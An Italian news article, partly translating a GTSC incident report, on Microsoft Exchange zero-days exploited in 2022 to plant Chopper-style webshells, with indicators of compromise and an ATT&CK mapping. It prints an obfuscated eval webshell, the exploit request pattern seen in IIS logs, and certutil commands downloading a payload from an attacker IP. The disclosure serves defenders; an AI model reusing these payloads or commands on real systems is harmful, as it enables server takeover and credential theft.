Red Hot Cyber
Sicurezza Informatica, Notizie su Cybercrime e Analisi Vulnerabilità
I cybercriminali stanno sfruttando bug zero-day di Microsoft Exchange che consentono l’esecuzione di codice in modalità remota, secondo le affermazioni fatte dai ricercatori di sicurezza dell’azienda vietnamita di sicurezza informatica GTSC, che per prima ha individuato e segnalato gli attacchi.
Gli aggressori stanno concatenando la coppia di zero-day per distribuire le webshell Chopper di origine cinese su server compromessi per acquisire persistenza finalizzata al furto di dati, oltre a spostarsi lateralmente su altri sistemi sulle reti delle vittime.
Intorno all’inizio di agosto 2022, il SOC dell’azienda GTSC ha scoperto che un’infrastruttura critica veniva attaccata, in particolare sulla propria applicazione Microsoft Exchange.
Durante l’indagine, gli esperti del Blue Team di GTSC hanno stabilito che l’attacco utilizzava una vulnerabilità di sicurezza di Exchange non pubblicata, ovvero una vulnerabilità di 0day, quindi hanno immediatamente elaborato un piano di contenimento temporaneo.
Allo stesso tempo, gli esperti di Red Team dell’azienda hanno iniziato la ricerca e il debug del codice decompilato di Exchange per trovare la vulnerabilità e sfruttare il codice. Grazie all’esperienza sui bug precedenti di Microsoft Exchange, i tempi di ricerca si sono stati ridotti e la vulnerabilità è stata scoperta rapidamente.
La vulnerabilità risulta essere così critica da consentire all’attaccante di eseguire RCE sul sistema compromesso. GTSC ha immediatamente presentato la vulnerabilità alla Zero Day Initiative (ZDI) per collaborare con Microsoft in modo da poter preparare una patch il prima possibile.
ZDI ha verificato e riconosciuto 2 bug, i cui punteggi CVSS sono 8,8 e 6,3, relativi all’exploit come segue.
Tuttavia, fino ad ora, GTSC ha visto anche altri clienti riscontrare il problema.
Dopo accurati test, è stato confermato che quei sistemi venivano attaccati utilizzando questa vulnerabilità 0day. Per aiutare la comunità a fermare temporaneamente l’attacco prima di una patch ufficiale di Microsoft, l’azienda ha pubblicato un articolo (che abbiamo parzialmente tradotto) rivolto a quelle organizzazioni che utilizzano il sistema di posta elettronica Microsoft Exchange.
Durante la fornitura del servizio SOC a un cliente di GTSC, il Blueteam ha rilevato richieste di exploit nei registri IIS con lo stesso formato della vulnerabilità di ProxyShell:
autodiscover/[email protected]/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%[email protected]
Controllando anche altri log, i ricercatori hanno visto che l’attaccante può eseguire comandi sul sistema attaccato. Il numero di versione di questi server Exchange mostrava che l’ultimo aggiornamento era già installato, quindi lo sfruttamento non era relativo alla vulnerabilità di Proxyshell in quanto la fix era stata installata.
Gli hacker malintenzionati hanno utilizzato varie tecniche per creare backdoor sul sistema interessato ed eseguire movimenti laterali verso altri server nel sistema.
Webshell
E’ stata rilevata una webshell, per lo più offuscate, rilasciate sui server Exchange. Utilizzando lo user-agent, è stato possibile comprendere che l’attaccante utilizza Antsword, uno strumento attivo di amministrazione di siti Web multipiattaforma opensource con sede in cinese che supporta la gestione di webshell.
<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>
SI sospetta che provengano da un gruppo di attacco cinese perché la codepage della webshell è 936, che è una codifica dei caratteri Microsoft per il cinese semplificato.
Un’altra caratteristica degna di nota è che l’hacker modifica anche il contenuto del file RedirSuiteServiceProxy.aspx in webshell.
RedirSuiteServiceProxy.aspx è un nome file legittimo disponibile nel server Exchange.
| Nome del file | Sentiero |
| RedirSuiteServiceProxy.aspx | C:\Programmi\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth |
| XML.ashx | C:\inetpub\wwwroot\aspnet_client |
| pxh4HG1v.ashx | C:\Programmi\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth |
Durante il processo di risposta agli incidenti presso un altro cliente, GTSC ha notato che il team di attacco ha utilizzato un altro modello di webshell
Esecuzione del comando
Oltre a raccogliere informazioni sul sistema, l’attaccante scarica i file e controlla le connessioni tramite certutil, che è uno strumento legittimo disponibile in ambiente Windows.
“cmd” /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]
"cmd" /c cd /d "c:\\PerfLogs"&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]
Va notato che ogni comando termina con la stringa echo [S]&cd&echo [E] , che è una delle firme del cinese Chopper.
Inoltre, l’hacker inserisce nella memoria delle DLL dannose, rilascia file sospetti sui server attaccati ed esegue questi file tramite WMIC.
File sospetto
Sui server, sono stati rilevati file sospetti di formati exe e dll
| Nome del file | Sentiero |
| DrSDKCaller.exe | C:\root\DrSDKCaller.exe |
| all.exe | C:\Utenti\Pubblico\all.exe |
| dump.dll | C:\Utenti\Pubblico\dump.dll |
| ad.exe | C:\Utenti\Pubblico\ad.exe |
| gpg-error.exe | C:\PerfLogs\gpg-error.exe |
| cm.exe | C:\PerfLogs\cm.exe |
| msado32.tlb | C:\Programmi\File comuni\sistema\ado\msado32.tlb |
Tra i file sospetti, in base ai comandi eseguiti sul server, è stato determinato che all.exe e dump.dll sono responsabili del dump delle credenziali sul sistema server.
Successivamente, l’attaccante utilizza rar.exe per comprimere i file scaricati e copiarli nella webroot del server Exchange. Sfortunatamente, durante il processo di risposta, i file di cui sopra non esistono più sul sistema compromesso, probabilmente a causa dell’eliminazione delle prove da parte dell’hacker.
Il file cm.exe che viene rilasciato nella cartella C:\PerfLogs\ è lo strumento standard della riga di comando di Windows cmd.exe .
Webshell:
File Name: pxh4HG1v.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1 Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5
Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
File Name: RedirSuiteServiceProxy.aspx
Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca
Path: C:\ProgramFiles\Microsoft\ExchangeServer\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx
File Name: Xml.ashx
Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1 Path: Xml.ashx
Filename: errorEE.aspx
SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257
Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx
DLL:
File name: Dll.dll
SHA256:
074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82 45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9 9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0 29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3 c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2File name: 180000000.dll (Dump từ tiến trình Svchost.exe)
SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e
IP:
URL:
hxxp://206[.]188[.]196[.]77:8080/themes.aspx
C2:
137[.]184[.]67[.]33
| Tatic | ID | Name |
| Resource Development | T1586.002 | Compromise Accounts: Email Accounts |
| Execution | T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
| Execution | T1047 | Windows Management Instrumentation |
| Persistence | T1505.003 | Server Software Component: Web Shell |
| Defense Evasion | T1070.004 | Indicator Removal on Host: File Deletion |
| Defense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location |
| Defense Evasion | T1620 | Reflective Code Loading |
| Credential Access | T1003.001 | OS Credential Dumping: LSASS Memory |
| Discovery | T1087 | Account Discovery |
| Discovery | T1083 | File and Directory Discovery |
| Discovery | T1057 | Process Discovery |
| Discovery | T1049 | System Network Connections Discovery |
| Lateral Movement | T1570 | Lateral Tool Transfer |
| Collection | T1560.001 | Archive Collected Data: Archive via Utility |
